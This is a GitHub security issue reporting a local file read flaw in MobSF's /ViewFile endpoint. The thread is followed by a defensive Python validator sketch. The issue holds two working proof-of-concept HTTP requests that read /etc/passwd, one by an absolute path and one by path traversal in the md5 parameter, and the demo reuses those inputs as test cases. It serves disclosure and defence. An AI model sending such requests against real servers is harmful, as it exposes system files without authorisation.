[Security] Local file reading regression < 3.0.0 #1197

Closed
legik opened this issue Dec 9, 2019 · 5 comments · Fixed by #1198
Labels
security Security issues in MobSF


legik commented Dec 9, 2019

ENVIRONMENT

Docker latest version

EXPLANATION OF THE ISSUE

It is possible to read any file on the system.

STEPS TO REPRODUCE THE ISSUE

1st poc (specify absolute path):

GET /ViewFile/?file=/etc/passwd&md5=376a1470cd79dc44a96615337c5b51c2&type=ios HTTP/1.1
Host: 0.0.0.0:8000
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3971.0 Safari/537.36 autochrome/blue
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

2nd poc (specify path instead of real md5):

GET /ViewFile/?file=etc/passwd&md5=../../../../../../../../../..///&type=ios HTTP/1.1
Host: 0.0.0.0:8000
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3971.0 Safari/537.36 autochrome/blue
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

@ajinabraham ajinabraham added the security Security issues in MobSF label Dec 9, 2019
@ajinabraham ajinabraham changed the title Local file reading [Security] Local file reading Dec 9, 2019
@ajinabraham (Member)

Thanks for reporting; we are taking a look at this.

@ajinabraham (Member)

@legik We have checks in code but for some reason that's not respected. Looking into the root cause.

@ajinabraham (Member)

@magaofei It looks like the clean_hash function is not getting called.

@sydowma sydowma mentioned this issue Dec 9, 2019
ajinabraham added a commit that referenced this issue Dec 9, 2019
This fixes form validation.
We need one more issue specific to path validation.

@ajinabraham (Member)

Fixed in latest master.

@ajinabraham ajinabraham changed the title [Security] Local file reading [Security] Local file reading < 3.0.0 Jun 19, 2020
@ajinabraham ajinabraham changed the title [Security] Local file reading < 3.0.0 [Security] Local file reading regression < 3.0.0 Jun 19, 2020
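
The two checks this thread points to (validating the md5 parameter and validating the file path), sketched as an added example that is not MobSF's own code. The function names and the `<base>/<md5>/` directory layout are assumptions made for illustration.

```python
import os
import re
import tempfile

MD5_RE = re.compile(r"[0-9a-f]{32}")  # a real MD5 hex digest, nothing else


def resolve_view_path(base_dir, md5, rel_file):
    """Return the resolved path of rel_file under base_dir/md5 or raise ValueError."""
    # Check 1 (input validation): the md5 parameter must look like a hash,
    # so a value made of "../" segments never reaches the filesystem code.
    if not MD5_RE.fullmatch(md5):
        raise ValueError("md5 is not a 32-character hex digest")
    root = os.path.realpath(os.path.join(base_dir, md5))
    # Check 2 (path validation): os.path.join() drops every earlier component
    # when a later one is absolute, so join(root, "/etc/passwd") is just
    # "/etc/passwd". Resolve the result first, then test containment.
    candidate = os.path.realpath(os.path.join(root, rel_file))
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError("file path escapes the scan directory")
    return candidate


def check(base_dir, md5, rel_file):
    """Hypothetical helper: turn the validator's outcome into a verdict string."""
    try:
        resolve_view_path(base_dir, md5, rel_file)
        return "allowed"
    except ValueError as exc:
        return "rejected: " + str(exc)


def demo():
    md5 = "376a1470cd79dc44a96615337c5b51c2"  # hash value quoted in the report
    cases = {
        "legit": (md5, "Info.plist"),            # constructed
        "absolute_file": (md5, "/etc/passwd"),   # file/md5 values from the 1st request
        "traversal_md5": ("../../../../../../../../../..///", "etc/passwd"),  # 2nd request
        "dotdot_file": (md5, "../../etc/passwd"),  # constructed
    }
    # Constructed sample tree: <tmp>/<md5>/Info.plist
    with tempfile.TemporaryDirectory() as base:
        os.makedirs(os.path.join(base, md5))
        open(os.path.join(base, md5, "Info.plist"), "w").close()
        return {name: check(base, m, f) for name, (m, f) in cases.items()}


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:15} {verdict}")
```

Either check alone leaves one of the two reported requests unhandled, which is why the commit message above separates form validation from path validation.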